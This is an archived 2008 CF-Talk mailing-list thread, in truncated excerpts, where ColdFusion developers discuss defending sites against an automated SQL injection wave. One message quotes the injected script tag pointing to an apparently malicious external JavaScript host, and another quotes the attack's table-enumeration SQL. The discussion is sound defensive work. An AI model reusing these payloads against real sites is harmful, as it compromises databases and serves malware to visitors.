RE: HELP! SQL Injection Attack!

ge- > From: Brian Peddle [mailto:[EMAIL PROTECTED] > Sent: Saturday, 9 August 2008 4:28 AM > To: CF-Talk > Subject: Re: HELP! SQL Injection Attack! > > Just curious as I have no seen this on an old asp site months > ago and now on CF. Every IP lookup I do goes back to >

Re: HELP! SQL Injection Attack!

On Friday 08 Aug 2008, Brian Peddle wrote: > Just curious as I have no seen this on an old asp site months ago and > now on CF. Every IP lookup I do goes back to If it's just a blind SQL injection attempt, the actual sending of the attack could be from a spoofed IP. -- Tom Chiverton *

Re: HELP! SQL Injection Attack!

On Fri, Aug 8, 2008 at 2:31 AM, Tom Chiverton wrote: > On Friday 08 Aug 2008, denstar wrote: >> RewriteRule [EMAIL PROTECTED] /security-violation.htm [NC] > > Won't that match email address ? Yup. Don't think I use those in the url or path for anything tho. Modifying those rules are pretty strai

Re: HELP! SQL Injection Attack!

Just curious as I have no seen this on an old asp site months ago and now on CF. Every IP lookup I do goes back to OrgName:Asia Pacific Network Information Centre OrgID: APNIC Address:PO Box 2131 City: Milton StateProv:

Re: HELP! SQL Injection Attack!

what are you seeing if you limit email to unique IP's? ours is way down if we do that. we are just sending unique ip's to one of our GREAT it guys to insert into ban list in firewall. should figure out how to auto add remove ip's On Fri, Aug 8, 2008 at 11:03 AM, Les Mizzell <[EMAIL PROTECTED]>

Re: HELP! SQL Injection Attack!

> http://www.actcfug.com/files/_SQLPrev.zip After putting this on a number of sites in just the last two hours, I am completely blown away by the number of attacks I'm seeing! Over 2500 in less than 2 hours on just 3 sites. My poor mail server can't take all the extra incoming mail!!! I'm going

Re: HELP! SQL Injection Attack!

> I have to agree with Dave. Every possible client scope needs to be checked - > and the form scope seems rudimentary to me. Not checking the form scope is > like setting up a firewall and locking down everything except a few dozen > ports near the bottom of the stack (after all ... we rarely get a

RE: HELP! SQL Injection Attack!

>-Original Message- >From: Dave Watts [mailto:[EMAIL PROTECTED] >Sent: Thursday, August 07, 2008 4:43 PM >To: CF-Talk >Subject: RE: HELP! SQL Injection Attack! > > > Since nearly all SQL injection attempts come through the URL > > (including the recent ones),

Re: HELP! SQL Injection Attack!

>>100 IPs is hardly any RAM. I'd use 10k entries, just as a starting number and scale down if it really becomes an issue. Another approach would be to store also the date the IP was entered in the list, and remove it after a certain number of days. -- ___ R

RE: HELP! SQL Injection Attack!

attacked from ports 10 through 30 :) -Mark -Original Message- From: Dave Watts [mailto:[EMAIL PROTECTED] Sent: Thursday, August 07, 2008 4:43 PM To: CF-Talk Subject: RE: HELP! SQL Injection Attack! > Since nearly all SQL injection attempts come through the URL > (includi

Re: HELP! SQL Injection Attack!

All our AOL users (a substantial amount) come through on a single proxy ip address. We set up ip blacklisting and almost instantly we had blocked all our aol users (we quickly took down the black listing). Something to consider. Dominic 2008/8/8 Tom Chiverton <[EMAIL PROTECTED]>: > On Friday 08

Re: HELP! SQL Injection Attack!

Just to make sure the finger points in the right place - the minor mis-spelling that Peter talks about was in a change that I made to Justin's file so it would work ok on our system. We require mail server, username and password in any cfmail tag, so i added them and made a dyslexic typing error.

Re: HELP! SQL Injection Attack!

Wondering if SQL in form fields is also a risk. At any rate Justin D. Scott of GravityFree ([EMAIL PROTECTED]) released a handy script which you can grab here: http://www.actcfug.com/files/_SQLPrev.zip The original script had a minor mis-spelling bug and I made the keywords alphabetical in orde

Re: HELP! SQL Injection Attack!

On Friday 08 Aug 2008, denstar wrote: > RewriteRule [EMAIL PROTECTED] /security-violation.htm [NC] Won't that match email address ? -- Tom Chiverton This email is sent for and on behalf of Halliwells LLP. Halliwells LLP is a limited liabili

Re: HELP! SQL Injection Attack!

On Thursday 07 Aug 2008, Ian Skinner wrote: > Exactly, if you are managing a popular enough site, it could happen. At > least once or twice in a blue moon. Likewise, you have plenty of other users, losing one isn't a big deal. -- Tom Chiverton **

Re: HELP! SQL Injection Attack!

On Friday 08 Aug 2008, Mike Kear wrote: > It's just plain annoying. What's the point of the attacks? What > does the attacker get out of it? Cash. It's either gaming search results in Google or pushing malware. -- Tom Chiverton This ema

Re: HELP! SQL Injection Attack!

On Thursday 07 Aug 2008, Claude Schneegans wrote: > based on the idea that > the bot is probably operating from an innocent infected PC and will > not be a threat for months, Oh, it will. Windows users who are infected are probably very unlikely to ever be cleaned. > about 100 or

Re: HELP! SQL Injection Attack!

It's a pity there isnt a way to stop these hackers coming to the site in the first place. I put Justin's script on some of my sites this afternoon and my mail box is filling up, drawing my attention to how many of these bloody attempts there are. Up to now, i've just had it happening automatica

RE: HELP! SQL Injection Attack!

Yup, that's correct Justin. Just a warning sign though :) I switch my hosting back in 2003, because the system event though it gives me my own SQL user/pass but it actually can see and queries other DB on the same machine (wrong priv). My current hosting, also allows user to query 3-4 other DB, bu

Re: HELP! SQL Injection Attack!

We also have been seeing this attack as well. Most of the SQL statement is in a hexadecimal format so it seems that using "keyword" filters could potentially be rendered innocuous (assuming the entire statement is all in hexadecimal). Why would ColdFusion or MSSQL accept SQL statements formatted

RE: HELP! SQL Injection Attack!

> Now this is real bad for shared hosting customers. > Cause even if we protect our sites, that SQL simply > queries all tables in the SQL server. So, if you > found your data compromise, the leak may have been > caused by other sites that are using the same SQL > machine, duh! On SQL Server the

Re: HELP! SQL Injection Attack!

I guess I should add that it checks both the file path/URL, and the query-string, for malicious whatnots. The file path/URL is probably only needed if you're already using rewrites. Otherwise you only need the ones with QUERY_STRING, probably. Also, I've commented out the "http:" rule, which you

Re: HELP! SQL Injection Attack!

I've cobbled together some stuff for apache that helps a good bit: Using mod_rewrite, you can at least prevent stuff from getting to CF. It still hits the webserver, but hey, better there than all the way to your appserver! Here's a modded version of some rewrites I found for IIS (MS people can f

RE: HELP! SQL Injection Attack!

I tried to decipher the SQL injection which hits my websites thousand times for this week. I found this particular code (it's attacking MS SQL): select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=... or b.xtype=... or b.xtype=... or b.xtype=...) The

RE: Re: HELP! SQL Injection Attack!

igger it. -Justin Scott --- Original Message --- >From: morchella[mailto:[EMAIL PROTECTED] Sent: 8/7/2008 6:39:26 PM To : cf-talk@houseoffusion.com Cc : Subject : RE: Re: HELP! SQL Injection Attack! does Justin's file redirect the intruder? i tried pass

RE: HELP! SQL Injection Attack!

I meant to say: Set the deny permission on the system table to the user that you use to access the database from cf At 07:27 PM 8/7/2008, you wrote: >You should set the permissions on the system table so that you can >not read or write to the system tables. There ~~

RE: HELP! SQL Injection Attack!

>Your database contains all its object names in metadata tables, which can be >queried directly. It was mentioned last week, but just to re-iterate: You should set the permissions on the system table so that you can not read or write to the system tables. There is no need for it, and by remo

Re: HELP! SQL Injection Attack!

It's a jungle out there. - Original Message - From: "Les Mizzell" <[EMAIL PROTECTED]> To: "CF-Talk" Sent: Thursday, August 07, 2008 2:53 PM Subject: Re: HELP! SQL Injection Attack! >> http://www.gravityfree.com/_sqlprev.cfm.txt > > &

Re: HELP! SQL Injection Attack!

does Justin's file redirect the intruder? i tried passing /products/index.cfm?n1Id=1&FOREIGN=test but nothing happened i am including the file in my application.cfm modified the email & such.. how can i test it ~| Adobe® ColdFusi

Re: HELP! SQL Injection Attack!

We run a very large linux website and have seen such SQL attacks for months now. However, this recent wave has *really* picked up over the last 48 hours.It began August 6, and we have logged close to 40,000 attack attempts and counting. Our code is well protected, and this attack appears

Re: HELP! SQL Injection Attack!

Just want to chime in on this -- I also stuck Justin's file online, and in just a few minutes, I had two of these email warnings. Very helpful for my naive non-parameterized pages. One thing I like about the email is, it tells me my domain and page of the attack -- and also the IP address whe

RE: HELP! SQL Injection Attack!

> Since nearly all SQL injection attempts come through the URL > (including the recent ones), that is where I put the focus. Nearly all automated SQL injection attempts come through the URL. The ones that, say, compromise peoples' credit card data, they typically come from forms. > With this sc

Re: HELP! SQL Injection Attack!

> I just put this on a site for testing purposes - and less than one hour > later - over 2 dozen emails to me of attack attempts 6 more from a different IP address while I was typing my original message!! Unreal! ~| Adobe®

Re: HELP! SQL Injection Attack!

> http://www.gravityfree.com/_sqlprev.cfm.txt Dude!!! Whoa!!! I just put this on a site for testing purposes - and less than one hour later - over 2 dozen emails to me of attack attempts I've got cfqueryparam on all queries on this site already, but to see that many attacks almost im

Re: HELP! SQL Injection Attack!

> Good effort... It does not check the form scope however - or CGI Since nearly all SQL injection attempts come through the URL (including the recent ones), that is where I put the focus. With this script I would not recommend checking the form scope as there is too high a risk of false positi

RE: HELP! SQL Injection Attack!

PROTECTED] Sent: Thursday, August 07, 2008 12:36 PM To: CF-Talk Subject: Re: HELP! SQL Injection Attack! > And yes, I'd like to see the URL "loop" script that was offered by > Justin Scott I've had many requests for the SQL injection prevention script, so I'm ju

Re: HELP! SQL Injection Attack!

I'd be interested in seeing this also. >We have CF5 >and CFMX versions if anyone wants a copy. > > >-Justin Scott ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://

Re: HELP! SQL Injection Attack!

- Original Message - From: "Bruce Schuman" <[EMAIL PROTECTED]> > I must have 100,000 pages I need to protect -- Better get started then. :) Read about two tools that can make the job easier for you: http://www.codersrevolution.com/index.cfm/2008/7/24/Announcing-the-first-ever-Internati

Re: HELP! SQL Injection Attack!

> What I'm wondering is a the pros and cons of doing it this way. Does it > slow down the app checking for this on every page hit? Or do it the old > fashion way and clean up all the queries. Thoughts? That depends on what your definition of slow is. On a modern server a simple check for a sp

Re: HELP! SQL Injection Attack!

> I must have 100,000 pages I need to protect -- and my primary > database has something like 180 tables, some of which have more than > 100 fields. So, I need something I can do quickly. And I got a lot > to learn about this. See my previous post regarding this code which can be placed in fr

RE: HELP! SQL Injection Attack!

page hit? Or do it the old fashion way and clean up all the queries. Thoughts? -Original Message- From: Justin Scott [mailto:[EMAIL PROTECTED] Sent: Thursday, August 07, 2008 10:36 AM To: CF-Talk Subject: Re: HELP! SQL Injection Attack! > And yes, I'd like to see the URL "

RE: HELP! SQL Injection Attack!

Thanks, Andy and Ian -- I am going through this previous thread (I did get hit with this 2 or 3 weeks ago also) -- so, I am just wondering how I can get a basic/minimal level of protection installed, maybe linked from application.cfm I must have 100,000 pages I need to protect -- and my primary

Re: HELP! SQL Injection Attack!

> And yes, I'd like to see the URL "loop" script that was offered by Justin > Scott I've had many requests for the SQL injection prevention script, so I'm just going to post a URL directly to the code and release it into the public domain for anyone interested: http://www.gravityfree.com/_sqlp

RE: HELP! SQL Injection Attack!

> Can this be done through a URL? Yes, easily. > Does the list of fields that have been injected provide any > clue about how or where the injection attack occurred? How > do these guys, or their program, know my table names and my > field names? I have some very obscure field names, and the

RE: HELP! SQL Injection Attack!

more information! > -Original Message- > From: Bruce Schuman [mailto:[EMAIL PROTECTED] > Sent: Thursday, August 07, 2008 12:17 > To: CF-Talk > Subject: RE: HELP! SQL Injection Attack! > > > The attack appends JavaScript to character fields. > > >

RE: HELP! SQL Injection Attack!

Any recommendations for web app firewall? I have worked with Netscreen network firewall for years. -Original Message- From: Dave Watts [mailto:[EMAIL PROTECTED] Sent: Thursday, August 07, 2008 9:01 AM To: CF-Talk Subject: RE: HELP! SQL Injection Attack! > I'd like to know h

Re: HELP! SQL Injection Attack!

Bruce Schuman wrote: > How do they do this? Yes it is done through the URL. This is well discussed here and in many blogs. But the just gist is that the errant URL parameter is an ENTIRE SQL function that well tell your database to scan every table looking at every field, and if the field is

RE: HELP! SQL Injection Attack!

rsday, August 07, 2008 11:17 AM To: CF-Talk Subject: RE: HELP! SQL Injection Attack! > The attack appends JavaScript to character fields. Hi. Just checking in here on SQL injection -- I am a self-taught self-employed CF programmer, been doing this for quite a while, but there is a ton I don'

Re: HELP! SQL Injection Attack!

We've got the same thing. Sonicwall checks everything coming in and out of the network and checks for anything that matches a database of known injection types. Helps a ton! Matt > We drew a great deal of breathing room to implement the solutions > discussed here with our installation of Son

RE: HELP! SQL Injection Attack!

> The attack appends JavaScript to character fields. Hi. Just checking in here on SQL injection -- I am a self-taught self-employed CF programmer, been doing this for quite a while, but there is a ton I don't know. And I have been hit by this current wave of injection So, my SQL Server 200

Re: HELP! SQL Injection Attack!

We drew a great deal of breathing room to implement the solutions discussed here with our installation of Sonicwall firewall (about 600 bucks). Its intrusion prevention settings are highly configurable, both globally and individually, and with an annual subscription of 200 dollars we get I beli

Re: HELP! SQL Injection Attack!

>>I'm a little bermused as to why you'd create such a response guys. Just to make sure I give a chance to a legitimate user, in case my robot detection was a bit too strong. For instance, I also have a test based on the number of HTTP request per second in order to discriminate robots from human

Re: HELP! SQL Injection Attack!

Craig Dudley wrote: > I suppose it would help **IF** a legitimate user came to your site at a > later date from a banned IP, but that's all, or is that why you are doing > it? > > Craig. Exactly, if you are managing a popular enough site, it could happen. At least once or twice in a blue moon.

Re: HELP! SQL Injection Attack!

Craig Dudley wrote: > I suppose it would help **IF** a legitimate user came to your site at a > later date from a banned IP, but that's all, or is that why you are doing > it? > > Craig. Exactly, if you are managing a popular enough site, it could happen. At least once or twice in a blue moon.

RE: HELP! SQL Injection Attack!

> I'd like to know how I can stop the requests from ever > hitting the web-server. > > Can anyone point me at a resource for a firewall solution? > I've seen some isapi filter solutions, but they all seem to > just clean the querystring and then forward the request on -- > so it's still hittin

RE: HELP! SQL Injection Attack!

r date from a banned IP, but that's all, or is that why you are doing it? Craig. -Original Message- From: Claude Schneegans [mailto:[EMAIL PROTECTED] Sent: 07 August 2008 16:42 To: CF-Talk Subject: Re: HELP! SQL Injection Attack! >>"Your system appears to be infect with a

Re: HELP! SQL Injection Attack!

>>"Your system appears to be infect with a bot and it is currently banned from access this site..." The cherry on the sundae ;-) In this page, I even have a form so the user can give his address and claim his innocence ;-) -- ___ REUSE CODE! Use custom tags;

Re: HELP! SQL Injection Attack!

Claude Schneegans wrote: > - In your application.cfm, simply check if cgi.REMOTE_ADDR is in the > list of banned addresses > and CFABORT if yes. Just throwing a random thought that occurred to me when I read this. If one cares to be a little nicer and proactive, maybe throw up a very simple

Re: HELP! SQL Injection Attack!

>>I was hoping to find an elegant solution that stored the Ips in the application scope for the length of the session timeout and then gracefully removed the banned Ips once the session timed out. How about doing this: - Create a server scope array or list (if you have several sites), or just in

RE: HELP! SQL Injection Attack!

all of its methods. Regards, CV. -Original Message- From: Claude Schneegans [mailto:[EMAIL PROTECTED] Sent: Thursday, August 07, 2008 10:14 AM To: CF-Talk Subject: Re: HELP! SQL Injection Attack! >>Claude, could you possibly share your code that stores the bad IP addresses for a

Re: HELP! SQL Injection Attack!

>>I'd like to know how I can stop the requests from ever hitting the web-server. If you detect the attack at the first request, and block the IP, the bot will not even get the first page, will not see all links in it, and will not search your entire server. --

Re: HELP! SQL Injection Attack!

>>Claude, could you possibly share your code that stores the bad IP addresses for a period of time to prevent these useless http requests? Thanks, CV. Well, I'd be happy to, but it is a rather complete and complicated system. It works for all sites/domains on the CF server, uses a database, and

Re: HELP! SQL Injection Attack!

> No, that's exactly what he described. The attack appends JavaScript to > character fields. And, unfortunately, blocking specific IP addresses won't > get you very far here, because it's a random, automated attack run from > compromised hosts in a botnet, I think. > > Yea I think it is too. I

Re: HELP! SQL Injection Attack!

>>Tuesday night received about 20 thousands instances (not an exaggeration). Slowing down now for us, but, heh, it's early. This is were banning IPs at the first attempt will reduce this pollution. If the attack is detected at the first attempt, and the address banned, the statistics will show on

Re: HELP! SQL Injection Attack!

I'd like to know how I can stop the requests from ever hitting the web-server. Can anyone point me at a resource for a firewall solution? I've seen some isapi filter solutions, but they all seem to just clean the querystring and then forward the request on -- so it's still hitting CF. I'd really l

RE: HELP! SQL Injection Attack!

! SQL Injection Attack! >>blocking specific IP addresses won't get you very far here, because it's a random. blocking IP addresses won't prevent injection in your database if it is not protected, but if an attack is detected the very first attempt, it will save thousands of

Re: HELP! SQL Injection Attack!

>>blocking specific IP addresses won't get you very far here, because it's a random. blocking IP addresses won't prevent injection in your database if it is not protected, but if an attack is detected the very first attempt, it will save thousands of useless HTTP requests on your sites, because

Re: HELP! SQL Injection Attack!

We handled this attack last month (it never did get through), and starting Tuesday night received about 20 thousands instances (not an exaggeration). Slowing down now for us, but, heh, it's early. ~| Adobe® ColdFusion® 8 software

Re: HELP! SQL Injection Attack!

> We have CF5 and CFMX versions if anyone wants a copy. I really see having several layers of protection to effectively stop this sort fo thing. Something at the application level sounds like a good first line of defense. I'd be interested in seeing this. Thanks ~~

Re: HELP! SQL Injection Attack!

>>Various people have been warning in the last few weeks that this sort of scatter gun approach that started with ASP-based sites is now migrating to ColdFusion powered ones. And it is growing up. Yesterday, my bad bot closed the door to about 50 attacks, and this morning I have 60 reported. Usu

RE: HELP! SQL Injection Attack!

> Anyway, whatever solves the Michael's problem I feel sure > is going to be a combination of things, not just the one. Actually, with this particular SQL injection attack it's really easy to stop. We created a SQL filter that is called from application.cfm. It loops through the URL structure an

RE: HELP! SQL Injection Attack!

andard. -Mark -Original Message- From: Mike Kear [mailto:[EMAIL PROTECTED] Sent: Thursday, August 07, 2008 6:36 AM To: CF-Talk Subject: Re: HELP! SQL Injection Attack! Well, as I said, the answer to this (as it is for a lot of things on the web) is not one but a combination of tactics. T

Re: HELP! SQL Injection Attack!

On Thursday 07 Aug 2008, Bobby Hartsfield wrote: > The solution is to filter all input from users with something like > cfqueryparam. The only reason to combine that with another solution is to > filter data that made it in already... and like Tom said, Ahh, no, not the only reason. Support I ente

RE: HELP! SQL Injection Attack!

ur user content, the terrorists win. ;-) ..:.:.:.:.:.:.:.:.:.:. Bobby Hartsfield http://acoderslife.com http://cf4em.com -Original Message- From: Mike Kear [mailto:[EMAIL PROTECTED] Sent: Thursday, August 07, 2008 7:36 AM To: CF-Talk Subject: Re: HELP! SQL Injection Attack! Well, as I said, th

Re: HELP! SQL Injection Attack!

On Thursday 07 Aug 2008, Dave Watts wrote: > Use CFQUERYPARAM around all user-submitted query values. And htmlEditFormat() around places where database data is output to the end user. -- Tom Chiverton This email is sent for and on behalf of

Re: HELP! SQL Injection Attack!

Well, as I said, the answer to this (as it is for a lot of things on the web) is not one but a combination of tactics. The ban ip thing might not be the bees knees for this but it sure helps with the kind of thing i THOUGHT he was describing. I've been able to almost eliminate spam entries from

RE: HELP! SQL Injection Attack!

> Im a coldfusion noobs and my database just got injected with > some script. > So for example one of the database field would appear > something like so: > Gisella427.jpg"> src="http://jjmaoduo.3322.org/csrss/w.js";>

RE: HELP! SQL Injection Attack!

> I konw you havent described a SQL injection ... No, that's exactly what he described. The attack appends JavaScript to character fields. And, unfortunately, blocking specific IP addresses won't get you very far here, because it's a random, automated attack run from compromised hosts in a botnet,

Re: HELP! SQL Injection Attack!

On Thursday 07 Aug 2008, Dominic Watson wrote: > Yes, I alerted my bosses to this at the time and unfortunately nothing > was done - we were too pressed for time. We now have 4 people going > through the site patching up all the vulnarable queries. It's sad but true that security holes are never s

Re: HELP! SQL Injection Attack!

Yes, I alerted my bosses to this at the time and unfortunately nothing was done - we were too pressed for time. We now have 4 people going through the site patching up all the vulnarable queries. Dominic 2008/8/7 Tom Chiverton <[EMAIL PROTECTED]>: > On Thursday 07 Aug 2008, Dominic Watson wrote:

Re: HELP! SQL Injection Attack!

On Thursday 07 Aug 2008, Dominic Watson wrote: > It appears we've been attacked by this last night / this morning too. Various people have been warning in the last few weeks that this sort of scatter gun approach that started with ASP-based sites is now migrating to ColdFusion powered ones. --

Re: HELP! SQL Injection Attack!

It appears we've been attacked by this last night / this morning too. Will update here with more info when we have it. Dominic 2008/8/7 Mike Kear <[EMAIL PROTECTED]>: > There are a number of things you can do, and in fact i use all of these - > > [A] Find out this person's ip address, and if the

Re: HELP! SQL Injection Attack!

There are a number of things you can do, and in fact i use all of these - [A] Find out this person's ip address, and if the form is submitted from that ip address, do nothing. Don't give them any kind of feedback at all.That'll stop this current attack, but since these idiots usually dart fro